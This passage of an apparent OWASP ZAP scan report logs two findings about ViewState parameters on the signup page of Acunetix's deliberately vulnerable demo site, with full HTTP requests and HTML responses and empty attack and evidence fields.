</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1186 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,186 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj%2Fih5dbVl0OMxvkohxyr8Ec4YAg%3D%3D&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql%2FxMtNSXxlEXNG8K%2FC7XIc2&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> 